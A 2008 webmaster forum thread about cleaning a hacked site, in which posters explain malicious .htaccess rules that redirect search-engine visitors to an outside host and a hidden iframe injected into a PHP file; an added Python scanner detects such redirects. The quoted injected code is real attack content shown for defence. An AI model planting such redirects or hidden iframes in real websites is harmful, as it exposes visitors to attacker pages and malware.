
suspicious code in htaccess file


php4U

4:24 am on Oct 23, 2008 (gmt 0)


The current site I'm working on had an issue with spam links all through it prior to me working on it. When I gained FTP access I found a folder named "test" which was suspicious in itself and when I look in it there were 5 folders full of spam links which I cleared out.

I've now gained access to their hosting control panel and can now see htaccess files(not able to see in FTP program like other hosting)

This is what I found in the .htaccess file, and example.com is their actual domain:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http: //us-euro.biz/in.cgi?4&parameter=example.com [R,L] -space added to de-link

I've never seen anything like this before, but at first glance it looks like a possible remote attack from the CGI script on that server when one of the major referrers is used... but it looks like it doesn't belong regardless.

When I was notified of a virus today, I found that an index.php file in the "photos" directory contained the following code; removing it cleared the virus.

echo "<iframe src=\"http://live-counter.net/?click=8645812\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

I would appreciate it if someone could shed some light on the htaccess before I remove it.

Thank you

g1smd

9:42 am on Oct 23, 2008 (gmt 0)


It is running a script (by sending a 302 redirect to some other site) for anyone that comes from a search result and therefore showing different content to users compared to what the search engine indexed.

In your FTP program have you unticked the box "hide filenames that begin with a dot"? The .htaccess file should then show up.
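The referrer-conditioned redirect g1smd describes (a RewriteCond block on HTTP_REFERER naming search engines, followed by a RewriteRule that sends the visitor to another host with the [R] flag) is easy to spot mechanically. The scanner below is an added example for this thread, not code from either poster; the attacker host in its sample input is a constructed placeholder, and the sample otherwise mirrors the rules quoted in the first post.

```python
"""Flag .htaccess rules that redirect search-engine traffic to another host.

Added example for the thread above. It walks the file line by line, collects the
RewriteCond lines that precede each RewriteRule, and reports a RewriteRule when
(a) at least one of those conditions tests HTTP_REFERER for a search-engine name,
(b) the rule carries the R flag (external redirect), and
(c) the redirect target is on a host other than the site's own domain.
"""
import re
from urllib.parse import urlparse

# Referrer names taken from the rules quoted in the thread.
SEARCH_ENGINES = ("ask", "google", "msn", "live", "aol", "altavista", "excite", "yahoo")

COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)


def find_cloaked_redirects(htaccess_text, own_domain):
    findings = []
    pending = []  # (line number, test variable, pattern) for conds before the next rule
    for lineno, line in enumerate(htaccess_text.splitlines(), 1):
        m = COND_RE.match(line)
        if m:
            pending.append((lineno, m.group(1), m.group(2)))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        target, flags = m.group(2), (m.group(3) or "")
        referer_conds = [c for c in pending if "HTTP_REFERER" in c[1].upper()]
        engines = sorted({e for _, _, rx in referer_conds for e in SEARCH_ENGINES if e in rx.lower()})
        host = urlparse(target).hostname or ""  # "" for relative targets such as /new
        is_redirect = re.search(r"\bR\b", flags) is not None  # matches R and R=3xx
        external = bool(host) and host != own_domain and not host.endswith("." + own_domain)
        if engines and is_redirect and external:
            findings.append({"line": lineno, "target_host": host, "engines": engines,
                             "cond_lines": [c[0] for c in referer_conds]})
        pending = []  # RewriteCond lines only apply to the next RewriteRule
    return findings


# Constructed sample: the thread's rule shape with a placeholder attacker host,
# plus a benign internal 301 that must not be flagged.
SAMPLE = """RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://attacker.example/in.cgi?4&parameter=example.com [R,L]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC]
RewriteRule ^old$ /new [R=301,L]
"""

if __name__ == "__main__":
    for f in find_cloaked_redirects(SAMPLE, "example.com"):
        print(f"line {f['line']}: redirect to {f['target_host']} for referrers {f['engines']}")
```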

jdMorgan

1:49 pm on Oct 23, 2008 (gmt 0)


Yes, change all passwords used for server FTP and shell access, and then nuke all of these weird .htaccess files and directories.

You can safely download them to your computer as long as they are in fact plain-text .htaccess files. Your client may wish to do this in order to pursue legal action -- This may have been done by a former employee, for example, rather than an outside 'hacker'. They would also want to request (through their attorney) that the host retain a copy of a backup taken before you started work on this site, for evidentiary use.

Jim

php4U

3:30 pm on Oct 23, 2008 (gmt 0)


Thank you both for the responses.

g1smd
I was on the right track, thank you for your clarification on what specifically the .htaccess was doing. As far as not seeing .htaccess files in the FTP program, I double-checked and no settings were changed. The program I'm using stores multiple logins, so I jumped over to a known server that has an .htaccess file and it showed. For now, I can at least remove them from the server through the control panel.

jdMorgan
You bring up some interesting points. In talking to the site owner I suggested that "I don't know why anyone would target your site specifically" just to leave the conversation open, knowing that anything like this can happen, and it was suggested that it could have been a former employee. This was never mentioned in the first round of cleanup, so I didn't question it, but they may have someone in mind.

Just as you suggested, right when I took the site over I changed the FTP passwords, but as I was going to mention it to them they asked if I could change it "right away" (speculation, but almost a hint that they were fearful).

You mentioned the backup, which I think could help developers as well! If you begin to work on a site and there is a history of viruses, a backup would be nice for the developer's protection as well. That way the developer will know they are protected from accusations, since anything can happen in business.